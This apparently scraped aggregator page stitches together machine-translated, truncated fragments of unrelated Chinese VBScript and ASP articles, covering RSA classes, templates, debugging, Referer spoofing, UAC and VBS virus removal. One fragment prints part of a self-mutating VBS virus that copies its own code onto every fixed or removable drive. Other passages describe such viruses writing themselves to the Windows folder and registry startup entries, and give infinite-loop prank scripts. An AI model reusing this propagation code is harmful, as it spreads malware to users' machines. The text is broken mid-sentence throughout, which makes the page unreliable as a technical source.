These days can not visit the hard disk to review the Dongdong, find out this thing out, because the level is limited, and there is no research on DHTML, so do is very rough, posted up is to stimulate, I hope that there is an expert can help modify or come up with more excellent dongdong out.
The test environment for the Windows XP Professional Edition SP2, temporarily found that code coloring has bugs, although there are solutions, but due to the amount of code (in Notepad to write code is reall
Encryption | decryption | Essence in ASP through the VBS class to achieve RSA encryption and decryption, recommended into the essence
This article consists of two documents
Test.asp Test Demo file
Clsrsa.asp to implement RSA encryption and decryption of the VBS class file
Here's the code:
1. test.asp
REM Article title: Implementing RSA Encryption and decryption via the
js| Ads | script | Show |js| ads | Scripts use AD modules when writing a project, in order not to use ASP to generate scripting code is more cumbersome, so the idea of writing a script class, that is, a class of scripting code to control all the display on the same page of the floating ads. But in the process of writing found that the JS script in the settimeout can not use the method of class. Strange, whether I was mistaken or JS script can not do this?? But the
Program | essence | Template Article title: VBS class processing template implementation code and interface separation
' Author: Yanek
' Email:aspboy@263.net
This program through the VBS class processing template to achieve code and interface separation of the program, mainly the following file composition
Index.asp,parse_cls.asp,template.html
Here is the code
1. Index.asp call the
Go from: VBS code How to use WScript debugging
Some friends use VBS to write code used to MsgBox output, sometimes a piece of code debugging finished output a bunch of MsgBox, adjusted to delete. It is more tiring to encounter a situation where you want to see the object ...
However, how a programming language may not have a better debugging method, MsgBox write tired when trying to use WScript.
WScript is
How to remove the VBS virus completely under WIN7 environment?
What can a VBS virus do?
In the case of displaying hidden files and extensions, the USB disk and my computer have multiple file Autorun.inf and *. VBS (8-digit VBS file) All folders under the root folder become two, one is hidden, and the other is short
, if you want to contact the following VBScript can also, but since there is a programming foundation recommended directly to find some reference books to read, it will be faster.
What is VBScript? The full name of VBScript is: Microsoft Visual Basic Script editon.(Microsoft Visual Basic Script version). As its literal disclosure, the VBS (further shorthand for VBScript) is a scripting language based on Visual Basic.
I further explain that Microsoft
Source: Ghost blog
Preface:Not long ago, I got a vbs script virus. My mother was confused, i'm lucky enough to find a complete introduction to the decryption process. Thanks to this wonderful post, I just got a step-by-step solution. Now I have this post today.Click to view original postWarning:1. The following Code indicates that the source code of the vbs virus may harm your computer's virus. Run it in a
Manipulate controls within a window by executing a VBS codeYou can also use the AddObject method to add your own classes, which can be used in dynamic VBS code as well.This approach is good when it comes to increasing program extensibility or scripting requirements.Option ExplicitDimvbs as ObjectPrivate SubCommand1_Click () VBS. Executestatement"Showtime"End SubP
First, VBS parsing HTML document original address: http://www.cnblogs.com/52cik/p/vbs-parse-html.html About VBS collection, online popular more methods are regular, in fact, Htmlfile can parse HTML code, but if DesignMode not open, sometimes package security information.But to open the DesignMode (@ the evening of the Prophet), all JS will not be executed, just c
After writing "worm. win32.vb. after the FW analysis and cleanup plan, I did not expect to write special bans. However, many people have mentioned this virus these days. If I solve it one by one, I am not busy! The scope of infection is quite large! I have previously written an article "vbs programming to build your own virus exclusive tool". vbs is a little familiar with it, so this time I will use
Script Programming teaching (1)
Many of my friends on the Forum asked about the script. I was interested in the script recently. Just write something. First of all, all my code isI have not studied vbscript and jscript, but I think it's similar.
I will not talk about the basic syntax, such as variable declaration, branch, loop, and function call. I don't know how to read it myself.
1. Our first vbs program: The old winter and winter.
* **************
Write a simple referer. php file in the test directory. The Code is as follows:
Copy codeThe Code is as follows: If (! Isset ($ _ SERVER ["HTTP_REFERER"])
Echo "No Referer ";
Else
Echo $ _ SERVER ["HTTP_REFERER"];
?>
If you click the link above, the referer page is displayed.Copy codeThe Code is as follows: Set http = CreateObject ("msxml2.xmlhttp ")Http. open "GET", "http://jb51.net/test/referer.php", FalseHttp. setRequestHeader "Referer", "http://jb51.net"Http. sendWScript. Echo http. response
Although many people think that this function is very weak, from the perspective of VBS, UAC is more or less useful. Under UAC restrictions, you can only double-click the VBS file to run under the standard user permission. Many things cannot be done, such as copying itself to the windows folder or writing the startup Item of the Registry. Storm 1 virus, which is very rampant in XP, can only be changed to th
. scriptfullname, 1). readall' reads its own code and assigns it to the variable vbcode
For stri = 0 to 3
Vbcode = Replace (vbcode, strarray (stri), CHR (INT) (RND * 22) + 97) CHR (INT) (RND * 22) + 97) CHR (INT) (RND * 22) + 97) CHR (INT) (RND * 22) + 97 ))) 'Replace the array escape characters with randomly generated characters
Next
Set file = FSO. createtextfile (drivearray (I) + "\ hack.txt") 'if you find a mobile hard disk or a fixed drive, create a file in it.
File. writeline vbcode 'Wr
Although many people think this function is very chicken, but to the VBS point of view, UAC is somewhat used. Under UAC, double-clicking a VBS file can only run under standard user rights, and many things cannot be done, such as copying itself to a Windows folder, or writing to a registry boot entry. In XP under the very rampant storm a virus, put under the Win7 can only be changed folder properties for hid
How to: Save the Code as *. VBS CAN run
I personally test will not be a big problem, is generally the use of infinite loops, not dead loops, can be completed through the Task Manager WScript or Cscript process can be.
Copy Code code as follows:
Todo
MsgBox "Hi"
Loop
No limit in English
Copy Code code as follows:
Set s = CreateObject ("Sapi.spvoice")
I=0
Todo
S.speak I
I=i+1
Loop
Cop
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.